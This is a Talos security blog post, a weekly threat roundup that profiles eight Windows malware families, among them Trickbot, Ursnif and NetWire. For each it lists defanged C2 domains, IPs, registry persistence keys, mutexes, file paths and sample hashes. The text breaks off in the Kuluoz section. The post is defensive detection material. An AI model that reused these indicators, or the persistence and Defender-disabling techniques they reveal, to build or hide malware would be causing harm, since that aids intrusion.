Friday, November 20, 2020

Threat Roundup for November 13 to November 20


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 13 and Nov. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Packed.Ponystealer-9793711-1 Packed Ponystealer is known to steal credentials from more 100 different applications and may also install other malware such as a remote access trojan (RAT).
Win.Packed.Ursnif-9793771-1 Packed Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Dropper.NetWire-9791538-0 Dropper NetWire is a RAT that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.Ruskill-9791575-1 Packed Ruskill, also known as Dorkbot, is a botnet client aimed at stealing credentials and facilitating distributed denial-of-service (DDoS) attacks. It spreads via removable media and through instant messaging applications.
Win.Malware.Trickbot-9791619-0 Malware Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Dropper.Lokibot-9791657-0 Dropper Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.TinyBanker-9791753-0 Dropper TinyBanker, also known as Zusy or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.Kuluoz-9791754-0 Dropper Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.

Threat Breakdown

Win.Packed.Ponystealer-9793711-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
23[.]227[.]38[.]65 14
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
firearmengraving[.]com 14
supersolar[.]jo 14
dcore[.]co[.]th 14
antonolsve[.]com 14
elearning[.]everpharma[.]com 14
mindtimeshare[.]bs 14
Files and or directories created Occurrences
%TEMP%\<random, matching '[0-9]{5,6}'>.bat 17

File Hashes

0fd73c42bc2c2ac17fe2dda89ccfed5f01aff96ece37b777c4c9635b110e8d6f 176b756dbc0dc4c7f5e997342d79437c45ced592457e4267afeb5a85e50d3ce5 5d9a855b3b1105c14cc5ce1b9d80f9904b9cdd62c7652c86f405dac033639a2c 69df736ab793e86f56654b9c9fc7f46e6a2befa83e81ddcc64c909c0e6bea71c 82ac0eec7d75fa0ccf647598a6b1e1d2f05f36868af6752d3f6ef341a4ede727 90f372289763553e86944b3a2395ce146351fb896675a6913e3e836e3b51fa19 9d9e544f7bcb95927adcdd2f684cd13704c7d59b0543b420e0df0dc1b7c11710 cc646a466f4bd1481cbac99cf842f6dcbffc44d08399efdf1a8267e4d6cc8367 d192bc667329cf55ba529b5b1e475ed59343502aab2a6f31f9b2a74c8c6e7961 d2eeba627c23992a614e84e30a35e64129b911a80c5a99c373ab04467152441b d34159c29d1b3b725f9799f3ae2313971ea26d400a9418783b6435687c2fab85 def31854cd9dabf69c8823feb2cbf7bbe33cc5be9f5963c2c9f7ee2d4d6a670f df83ce114d1517954b542cbf73438ac392fc003ee360f44bd1d8702e60210aee f214b3e78e7775971e58404616674a1554978c3f8ea2504832b9acffd00905d6 f66eb92fcb5d0fd52cfa4cf52d3098882bae4ecca852bfd32e48b782e74b1891 fa0d48a8cf59f3c6764da5cf1f028f5c2f00d5f4dce5b8f33e1990d6668bef37 fe55c927526a30c63125a35e7314c8f2dd0f5337364b4ffe82e5a7ecb4bd3cb9

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Ursnif-9793771-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: appmmgmt
23
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Install
23
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 23
<HKCU>\SOFTWARE\MICROSOFT\IAM
Value Name: Server ID
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Scr
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Temp
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\\PARAMETERS\PORTKEYWORDS\DHCP
Value Name: Collection
1
Mutexes Occurrences
{<random GUID>} 15
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269} 12
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1} 12
Local\{B1443895-5CF6-0B1E-EE75-506F02798413} 12
{EF12DD09-8223-F98C-0493-D63D78776AC1} 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]16[.]45[.]99 8
104[.]16[.]44[.]99 7
204[.]79[.]197[.]200 3
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]ietf[.]org 15
trdsabstraction[.]info 12
Files and or directories created Occurrences
%APPDATA%\ds32mapi 23
%APPDATA%\ds32mapi\dhcpxva2.exe 23
%TEMP%\<random, matching [A-F0-9]{3,4}> 23
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat 23
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 12
\{4BC230AC-2EB3-B560-90AF-42B9C45396FD} 12
%TEMP%\11B0\88D8.tmp 1
%TEMP%\DE32\EF19.tmp 1
%TEMP%\E66\8733.tmp 1
%TEMP%\E026\F013.tmp 1
%TEMP%\FE02\FF01.tmp 1
%TEMP%\FA98\FD4C.tmp 1
%TEMP%\7310\B988.tmp 1
%TEMP%\DD96\EECB.tmp 1
%TEMP%\FC8A\FE45.tmp 1
%TEMP%\F5B8\FAEB.tmp 1
%TEMP%\71BA\B8DD.tmp 1
%TEMP%\4472\2239.tmp 1
%TEMP%\CD0\8668.tmp 1
%TEMP%\4608\2304.tmp 1

File Hashes

025b1406c05c082cdfd4449136451fafbae0a578bd89882acd0a551a6d3cc2b2 035714518e248530b031257a62a4bd9a8066e28277f223b2264151ba0dcb9cfa 1d0bcba0c91e94fb4e64ce98853b7f5392affc940c77b8c339d87893d74bfb5a 224ed36aa31c2428abb59779b0dbbfbcae9a3df84ed960e09e9353ebba9172d7 23ed8b64ae6587371438f1f60c37dd3015d21d3e16e7391ad4ddd736986bf4a4 2503e31ca9c3e4ec6dc063aa9a1140b1303a9f66dd7b5b7140d5be9d235f6db1 2ce4ca4579e0c6384f70d4d471451b9de976dbbabf2273bb04fcf360228617d3 3c51529e11f3cff24bca191bb63e2100c0bbfb2d4aadf811eba7392378420450 4831d4c2543e27e164599bd88ca1ec9d9e8bd34a095e635c8d8c05a6c0399948 570518b7a38943c0d5ca6af87051096235699c3d81eb6f473b7ce0257719d6e4 5cf36c582304c9551af42bf602b930ce37305512f15a6993c2085b44451d767f 605a2b40806b1fad19321895150cf5506e4986812a39ac768209fc2dbec9d047 732706ada05b6f361c26720ac8849113a8cba7bd886db27dd3c60dfae3736b80 7610203f9278087ff6c72f945e01f2881fe58bb21bb0148a6605db310396e8a5 7981a3655c51c9af43baef37e26ae0705ac6bba4707d3e6f388032369ef40aeb 8194ef8e918c5e9eb4a63ba6429b647e1a75f85e304d723f90fbecbbbd3132b0 8a346e3b7a4baf9e551acaaa2b9ad5b83677e0b363b7a24f3aa925eb7e3e98a5 aa08751e0bcbfbf33376d5204bb76707a75a9155be508d10ffdcf79d75f2bafd b783e059eff33edde6a6be28b4db220f44a7718c0ff186cf5f65df298c2dae35 bd2fe3414b937a4c8aac6b2430b93e2435ff64908974dcb2b6b824fc41696466 d43fcc82467726e27de171718f95ba5bf198d02c8bfd5bf8dab0da67530640c9 ea2ba17ff3b4ad2066ced30a7d8d0025348e24f858b86658ccce5774269f52a1 f2f64d0e363e61041580a6484fcd7031a7afc9862f860d0c9e594b746e82beb5

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.NetWire-9791538-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Mutexes Occurrences
- 4
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
185[.]140[.]53[.]231 14
Files and or directories created Occurrences
\.Identifier 14
\TEMP\.Identifier 14
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\copied.vbe 14
%TEMP%\copied.exe 14
%HOMEPATH%\Start Menu\Programs\Startup\copied.vbe 4

File Hashes

05fd93b4f6461a3fa19e38b482c7c372ddcbf9c6d28e3dfe8fd4db854138eb31 0ab252c2030251d9349af49c0302cd99a3fbcc4986496ebf066bf356064bcdb0 2966724847a8b631a4dcaec9a97a553215b021330c73cc67171f4e144caa4ad4 33a28d2dceceeee37555827985f7144f2cc7e4eb5c60add95cfd4e7bb0d59814 5a2ebdfe880d4ab18f896489654531ea235a85a5305f88f586f73788124d7675 6a3f7b69737a5278502bc970141616b59eb9b45824f8eec70c7bb9647b061911 6db000623c7055806472a7b6432d723e97d29aab449ae8a11fa6c43c8a1e0931 6fdcfa74b87cac7dd64fa319a5374ba5c7ed6bc0df9a586c0ae677009d6c2de7 733746c059b7bfb321c630d4d4163389f1c075aae5186c9c7486e90e5172b075 7bbf9d93e7dfe0fd5c3f4b9e84c18f4250697f351598f4ec52c19f757d32bef8 886b9318b9c3f3a2dcf5df566cc00994c31521883548c4391cb47740bab506e9 a2c9f40ab0d9577bfa68a32aa858c60909c988a557897a0a8703922708f65624 b11d25a98c485c47e797b564e5bb8f4b04c34d4f4ac7e9e457026c5974d3bde9 d930658345944656d67151147359ae7c23501aa902f4c0670cb4594d97c4cd2f

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Ruskill-9791575-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BCSSync
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Eoawaa
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update Installer
5
<HKCU>\SOFTWARE\UAZI SOFT
Value Name: UaziVer
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live Installer
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Windows Live
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 4
<HKCU>\SOFTWARE\UAZI SOFT 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 1081297374
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 1081297374
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: splwow64.exe
1
Mutexes Occurrences
FvLQ49I›¬{Ljj6m 5
c731200 1
Xl5jVVxcVWIx 1
1z2z3reas34534543233245x6 1
SVCHOST_MUTEX_OBJECT_RELEASED_c0009X00GOAL 1
SSLOADasdasc000900 1
-9caf4c3fMutex 1
FvLQ49I {Ljj6m 1
alFSVWJB 1
{9E3C146B-9ECE-17D5-CF30-7364D9E21D36} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
204[.]95[.]99[.]243 5
162[.]217[.]99[.]134 5
104[.]215[.]148[.]63 2
104[.]42[.]225[.]122 2
66[.]171[.]248[.]178 1
212[.]83[.]168[.]196 1
195[.]22[.]28[.]198 1
208[.]100[.]26[.]245 1
103[.]234[.]36[.]148 1
121[.]11[.]83[.]197 1
131[.]211[.]8[.]244 1
176[.]9[.]102[.]215 1
95[.]165[.]168[.]168 1
35[.]205[.]61[.]67 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
n[.]ezjhyxxbf[.]ru 5
n[.]hmiblgoja[.]ru 5
n[.]yxntnyrap[.]ru 5
n[.]vbemnggcj[.]ru 5
n[.]yqqufklho[.]ru 5
n[.]oceardpku[.]ru 5
n[.]zhgcuntif[.]ru 5
n[.]jupoofsnc[.]ru 5
n[.]kvupdstwh[.]ru 5
n[.]aoyylwyxd[.]ru 5
n[.]spgpemwqk[.]ru 3
europe[.]pool[.]ntp[.]org 2
bot[.]whatismyipaddress[.]com 1
nutr3inomiranda1[.]com 1
nutr3inomiranda4[.]com 1
nutr3inomiranda2[.]com 1
nutr3inomiranda5[.]com 1
nutr3inomiranda3[.]com 1
api[.]wipmania[.]com 1
n[.]jntbxduhz[.]ru 1
n[.]lotys[.]ru 1
nutqauytv5a1113xyzf115zzz4[.]com 1
nutqauytva513xyzf11zzzzz0[.]com 1
nutqauytva6213xyzf112zzz1[.]com 1
nutqauytva1413xyzf114zzz3[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
%APPDATA%\WindowsUpdate 9
\$RECYCLE.BIN.lnk 5
%TEMP%\c731200 5
%APPDATA%\c731200 5
\System_Volume_Information.lnk 5
\jsdrpAj.exe 5
%APPDATA%\Update\Explorer.exe 5
%APPDATA%\Update\Update.exe 5
%APPDATA%\WindowsUpdate\Updater.exe 5
E:\$RECYCLE.BIN.lnk 5
%APPDATA%\Microsoft\Windows\themes\Eoawaa.exe 5
E:\System_Volume_Information.lnk 5
E:\c731200 5
E:\jsdrpAj.exe 5
%APPDATA%\Update 5
%TEMP%\temp41.tmp 4
%APPDATA%\WindowsUpdate\Live.exe 4
%TEMP%\apiSoftCA 4
%APPDATA%\Windows Live 4
%APPDATA%\Windows Live\debug_cache_dump_2384394.dmp 4
%APPDATA%\Windows Live\pldufejsya.exe 4
%ProgramData%\msodtyzm.exe 2
%SystemRoot%\kernel32.dll 2
%APPDATA%\Microsoft\Windows\Themes\Uxoioc.exe 1
%SystemRoot%\Tasks\alFSVWJB.job 1
*See JSON for more IOCs

File Hashes

0867ad414f997b7333faa9d3abe2e3f034f9bbf5c79edf68b5ebb4d9dda7c802 0a53aa6b252e373862493e0ade61d53faa706b041fd0ae091b667b92a1808bb5 1889effebe3a7f1407213329aad49b56bb1f3ecae8bfaf7b6849facea00f1c3f 389b78331f23a3387251866370bc4496ddd1ec318d0001b9b8035a6cf6af959a 3fbf79c5ffa710664255c233905f6a6b4a55b4ba065db7e3e8f16dfe224459de 7ebd2bae76df766323980e7a277ae0b47e3444c1a18d1abe1cb64c05d0490e9c 85abb6236217efedc745b2fde949ae33b02f77fb818716950df6098df2e23cd0 978cac42a8d2648e1cd547bd36be0bd201b2307c94351b8e27468e5d1a4d3fba a461ffa8940ba03f46df16259751f41c7d0d90a34453bfe285de55c9197c5155 ab5600459af2afcd0c79f358718b283388cb3557f43bf04238d32b55f51cec6a ae0c673341c4c5cc427d9576f8048755f8f6d8429c251d01f8b9949d63731667 aeb242d85750ddf79e0a4866d0b9be2e81906c63ecaf6311673b94ef5343fb5c bce6e5772c65106b04ffcd76362464dd3f9460371f42fbcf3eeb60987e457668 c853f03f54f344162f11ed6520ab121af5b8c6253b9f9d9277d1ff0fb1acc8e9 d0c627268431282d4c33acd576f6bcc2e65d625f74da2f41e564137e41d7b5f0 d50eb0825365855c4d4bd030c2a6b57e627533ca68d1fa00a05ea8fbd2157b80 d7a4696124e448bfa7c53840d90bad9731f1df9a382434c2f5f38af654e22655 feb57db90346fc97e9b285f7f242268b4ad4e81d4e6e5fcbb39eda0f64d581ce

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Malware.Trickbot-9791619-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 35 samples
Mutexes Occurrences
GLOBAL\{<random GUID>} 35
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
194[.]5[.]250[.]178/31 5
204[.]79[.]197[.]200 3
85[.]143[.]218[.]249 1
5[.]182[.]210[.]226 1
200[.]127[.]121[.]99 1
185[.]14[.]31[.]72 1
212[.]80[.]217[.]243 1
Files and or directories created Occurrences
%APPDATA%\MonoLibrary 30
%System32%\Tasks\Mono Library 30
%APPDATA%\MONOLIBRARY\<original file name>.exe 28
%APPDATA%\MonoLibrary\data 9
%APPDATA%\MonoLibrary\settings.ini 8
%APPDATA%\FileExt 5
%System32%\Tasks\Shell File Extensions 5
%APPDATA%\FILEEXT\<original file name>.exe 5
%APPDATA%\FileExt\settings.ini 3
%APPDATA%\MonoLibrary\6f80025bde0da96f33bf751168ca7d67.exe 1
%APPDATA%\MonoLibrary\f242faa29b06fca60de6637aefc2b457.exe 1

File Hashes

0180a53f8fccb987408a0c622f3b62630dd19cc3e84b5b24a447de4c4da3f926 030a5d3849f45bc96142217dcfd20bab9c96dc1e1141a0b738f93ee828a3a660 04325bce2709d6bd769c99666350ee8d38c9ec8d6814e471783d0044ad67dfd1 05b16c068892e4c37a128fddfde75e1b8ea5e96dc36a8bba6f27cf32982164ce 0693f993b33d7059e10763098eea96ddb5635951779b8f42b3d54900225666b3 06db60c2be37b3680f3a4e64ba0dee7eae73c0b791ab452c9c215f23d2385536 07d337c974b4b7f408fa4f160e77954258d9b5a0804703a97610c2b3856d8254 08fad9c7ea40d3d9453ac108f43c23eb7d210f4cbd1d3c64b05c1940a3a09e64 09663b39028952e5baa1b128f230d293dfbe426e48e954c6dbabd4c6d729d4f5 0f646a9856fccb7a43887672f23cbbdd0c2fb7da2432891eb06fd29127efcb0d 0fa942bad45abde9753867b98a5b44576583d6bca4c81ac21ec54aea73216d8f 107bf5e890a41ca2cee3f5df53ff4d8d3a2d6bde90a2b0b9cd9523dc42f9b32b 113a180aa24b8558049264e84b991f5590202bf7708136e2cf44b6668c60f7bc 138b43c702ecb2a49d987b46269a6d87d4054346bc5b2e7180937c39947e058f 148c1ef994d3f7fca1238a3f977f279e89d2fe7c320dd18684787025ad6c3369 16c28969b0e11e9e7194aa6b70a3c99c6371e29aaca923b9644a8eb437a155e1 18d4f1a6caab7bfc3b28b6ce129518166c9f72c82962957bb5b4c92f816cc596 196a947c89ae40b8350155e4d5c521eab44432b8d234677868483f31b9d18846 19db44ea86ce5522337992bff502d7a31a271de4fceb2551704c9757477b78e0 1ac155873282737be0b0c6bba7d65cf265ef304a26add37a692fbf96df511593 1b1031685922cd8bcb0b469851c6b6eba15ea06e87a1b48eee3a606d38bad6d3 1b1555a96f617f0d17ad3b59ca38126be64c5c3da660fb030c9a41c7951d88d1 1cb67ce1be241cb988de3209cc272a9abac46002e438c9c45a242f9c2776eeee 1cb9b49ef81278cefda69d9eea677762d8677e4dfde0b5320d9650d100695c8d 1d237c89a575ecfd380654ca1fa45b546f83201c001344cb3ec3a963ea4b0314
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.Lokibot-9791657-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update
1
Mutexes Occurrences
3749282D282E1E80C56CAE5A 7
9DAA44F7C7955D46445DC99B 6
Global\cefa5160-24d7-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
103[.]83[.]81[.]68 3
185[.]180[.]198[.]135 2
185[.]209[.]1[.]127 2
104[.]16[.]155[.]36 1
204[.]79[.]197[.]200 1
103[.]129[.]98[.]58 1
46[.]17[.]98[.]105 1
188[.]165[.]205[.]198 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
legalpath[.]in 2
paciflxinc[.]com 2
whatismyipaddress[.]com 1
airmanselectiontest[.]com 1
venitronics[.]com 1
www[.]webserverboxservices[.]com 1
mail[.]ilkimegitim[.]com 1
webserverboxservices[.]com 1
Files and or directories created Occurrences
%APPDATA%\D282E1 7
%APPDATA%\D282E1\1E80C5.lck 7
%APPDATA%\7C7955\5D4644.lck 6
%APPDATA%\7C7955\5D4644.exe (copy) 5
\Sys.exe 1
\autorun.inf 1
E:\autorun.inf 1
%APPDATA%\pid.txt 1
%APPDATA%\pidloc.txt 1
%TEMP%\holdermail.txt 1
%TEMP%\holderwb.txt 1
E:\Sys.exe 1
%APPDATA%\WindowsUpdate.exe 1
%APPDATA%\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg 1
%TEMP%\WAXDB19.tmp 1
%TEMP%\WAX19A3.tmp 1

File Hashes

0204655a385df7ad8797bfc31f817e1208e7e62154c866a333683f35aa9a7d41 18885983795417170faf05d6f4c58dc6dc2ef4977f97d37a2b2c461cc3d0f4a2 1ab3437a50129edfc7fb6fb1117468f6166387e29e7b8b84123bc817fa80ec53 26f747be5df0197b793030c61e5bdc84336057b7e40153e42e6f17b50cd420ec 578527d2bad084c3e95629d1bf870074cdc7c88e857256da8884f3c16272a629 5b0dae6508cd9af449f5462cdbe32c2550339d23c1e77028ab87659564be75de 6020db3ccb630880906593dbdbe6c4487ec81e8dea4555114f33eef0ac16b62a 6dea1bdf016f1e88f6fedfa3b79d89ebfed8f1aa0db547a7d389bc59b589f18a 89605a9bb702c8522e00bdf8a51a381eddda7ba3fa1bf2a195b05b2e4cd0c278 9ad6d1ef3260754d34b6be1ce0aabf340d879eec0f6fe88086690d0fb0ea14e8 a2058e7365fff5315e1a1452e7d438d8e8149791293654ad0c3976bde76a1795 baedd4452291763813c3fcb3129f1be226b33c5e2ccc8fb85bf6d614c57da29d ce9d8f4765b5204c63db281fb6f3124681ee66a75d236426027c71f1fc575b0f ea67e1e48066b1cffcc0af2693d8a38759b168d7b3334ccc9841b41403a8d2f6 ed99c6d4488132dfafd9fc90a075a88eafbc5dfe6d24a22b05449f932ae02f52

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.TinyBanker-9791753-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: EEFEB657
15
Mutexes Occurrences
EEFEB657 15
4A60888F 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
216[.]218[.]185[.]162 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ivrvfntohghc[.]com 1
oreganogf[.]su 1
llenngpoefxy[.]com 1
ifkmqtsfiiqr[.]com 1
ihxghiyqmhim[.]com 1
jnfeqhkpihgc[.]com 1
fjedebccuuhc[.]com 1
Files and or directories created Occurrences
%HOMEPATH%\AppData\LocalLow\EEFEB657 15
%APPDATA%\EEFEB657 15
%APPDATA%\EEFEB657\bin.exe 15
%APPDATA%\4A60888F\bin.exe 1

File Hashes

083b8120a63335546b2c0a2752858c020da79aaba3d77312309b0593edc41e11 0f8d6c7f5d30903c061eeb72b86e2244febfaac9acc487f00b4b7a498443c176 154ce8d2f23b85f2b336a33e25e7169b2dd6d7dd00b495bbf2fd75c3d55e1bc2 15d994a9f7d733e2ed3d152892700cd1deff33612400773c43fe432abb88b204 212ba3802d3a843241f6df38fd858292821d3f76d028fc9e8a4b0e7aefcfcedf 3e1a950fecec8ec3389c9f551363fc44b0e7b8a29bf805d17d097aa470e7eeb3 3f9f2e8ad68f8d67a60c9adae68516b72c772a8f0f6c87e0c6f16f1e2ac599a5 48d33d07e368bb97efd423fffa53499cde4d6c39e35458bd3e0789d116667d55 6e31790fe5123d0ecd396f699ff40fdd3951ecb1c9684f031bfad8d90327bcb6 829fb2e1b0916d0b90d53011efe234b5a856da2c9ab6a8488bf51eb50be23839 90ceb0b7911416cfeece5c05c152063558633130ff62f4b00e15d3d0fee2cfbf a7449c74ef44975eb78306706ab75334ece23db46d1f5d2d4b1a699a1044519e c38e694810b920061c75480baf5d38c9c4a839d7025d664279f0cd6e371c9a40 e51a70b05fc74cbeb366ea82063a653c2f54765bb417bcf69af7740ebddaac34 e8e5762bf734458438b97956fb442e7dedbafa6d05faa3ff30d60c9c5821bcd3

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.Kuluoz-9791754-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
